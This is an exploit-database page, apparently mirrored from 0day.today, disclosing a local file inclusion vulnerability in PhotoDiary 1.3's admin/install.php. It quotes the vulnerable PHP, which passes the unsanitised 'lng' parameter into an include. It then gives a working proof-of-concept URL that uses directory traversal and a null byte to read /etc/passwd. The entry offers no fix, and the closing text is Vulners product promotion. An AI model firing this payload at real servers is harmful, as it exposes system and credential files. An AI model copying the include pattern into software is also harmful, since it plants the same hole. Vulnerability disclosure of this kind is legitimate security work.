Lucene search
K

PhotoDiary 1.3 (lng) LFI Vulnerability

🗓️ 31 Dec 2009 00:00:00Reported by cOndemnedType 
zdt
 zdt
🔗 0day.today👁 11 Views

PhotoDiary 1.3 (lng) LFI Vulnerability. Discovered by cOndemned

Code
======================================
PhotoDiary 1.3 (lng) LFI Vulnerability
======================================

PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned
 
download: http://code.google.com/p/photodiary/
 
 
source of /admin/install.php (lines 9 - 15):
 
    if (isset($_GET['lng'])){
        $LNG = $_GET['lng'];            # 1
    } else {
        $LNG = "ITA";
    }
     
    include "../common/language_".$LNG.".php";  # 2
 
 
proof of concept:
         
    http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation